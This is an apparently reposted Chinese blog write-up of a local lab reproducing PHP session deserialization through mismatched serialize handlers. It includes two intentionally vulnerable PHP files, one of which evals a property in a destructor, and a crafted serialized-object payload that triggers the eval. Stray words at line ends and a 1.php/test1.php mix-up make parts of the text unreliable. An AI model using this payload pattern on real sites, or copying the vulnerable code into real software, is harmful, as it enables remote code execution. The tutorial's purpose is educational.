PHP SESSION反序列化本地样例分析

PHP SESSION反序列化本地样例分析php

0X00漏洞缘由session

主要缘由是: ini_set(‘session.serialize_handler’, ‘php_serialize’);函数

       ini_set(‘session.serialize_handler’, ‘php’);测试

       二者处理session的方式不一样。网站

0X01漏洞分析this

若是在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不同,会致使数据没法正确第反序列化。经过精心构造的数据包,就能够绕过程序的验证或者是执行一些系统的方法spa

0X02漏洞环境code

Windows10对象

Phpstudy一件集成环境blog

0X03漏洞复现

首先如今本地phpstudy网站根目录新建俩个测试用例1.php和2.php

内容分别为

1.php:

<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
?>

2.php:

<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["test"]=$_GET["a"]; ?>

漏洞利用

首先构造反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

能够看到2.php中接收的参数为a

提交2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},

也就是访问127.0.0.1\2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},

访问后结果以下:

而后再访问http://127.0.0.1/test1.php,成功执行phpinfo()

0X04漏洞分析

提交2.php?a=|O:4:“test”:1:{s:2:“hi”;s:10:“phpinfo();”;},

传入的数据会按照php_serialize来进行序列化:a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

此时访问1.php,应用程序会按照php来反序列化SESSION中的数据,此时就会反序列化伪造的数据,php引擎会以|做为做为key和value的分隔符,那么就会将a:1:{s:4:"test";s:43:"做为SESSION的key,将O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}做为value,而后进行反序列化,最后就会就会实例化test对象,最后就会执行析构函数中的eval()方法。

相关文章
相关标签/搜索